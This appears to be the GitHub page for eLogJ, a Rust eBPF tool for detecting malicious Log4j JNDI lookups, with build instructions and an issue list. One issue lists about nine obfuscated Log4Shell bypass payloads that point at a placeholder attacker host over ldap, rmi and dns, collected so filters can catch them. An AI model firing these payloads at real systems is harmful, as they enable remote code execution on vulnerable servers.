elogj's Introduction

eLogJ

extended Log4j observability tool used to detect and prevent malicious JNDI (/LDAP) lookups. Currently tested in a controlled environment.

Developed with aya (https://github.com/aya-rs/aya) a Rust eBPF library.
Use in tandem with https://github.com/christophetd/log4shell-vulnerable-app (baseline).

Dependencies

Rust stable and nightly toolchain:
rustup install stable
rustup toolchain install nightly --component rust-src
bpf-linker:
cargo install bpf-linker
Ref: https://aya-rs.dev/book/start/development/#how-to-use-this-guide

Build Userspace:

cargo build

Build Kernelspace:

cargo xtask build-ebpf

(Optional) Change Config:

Default config: draft-rule-set-default.yml

cat logger-info/src/draft-rule-set-v1.yml

Run:

cargo xtask run

Verbose:

RUST_LOG=info cargo xtask run

elogj's People

Contributors

Watchers

elogj's Issues

Verify logger-info source files integrity

/logger-info/src
\--> /header-dec-seq
\--> /header-offset
\--> /rulesets

Refs:

eMON (https://github.com/WillGAndre/th_EDReBPF)
LSM aya-rs (https://aya-rs.dev/book/programs/lsm/)

Add custom filter for bypasses

Bypasses:

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/} //Notice the use of rmi
${${::-j}ndi:dns://attackerendpoint.com/} //Notice the use of dns
${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"

Ref: https://book.hacktricks.xyz/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell#bypasses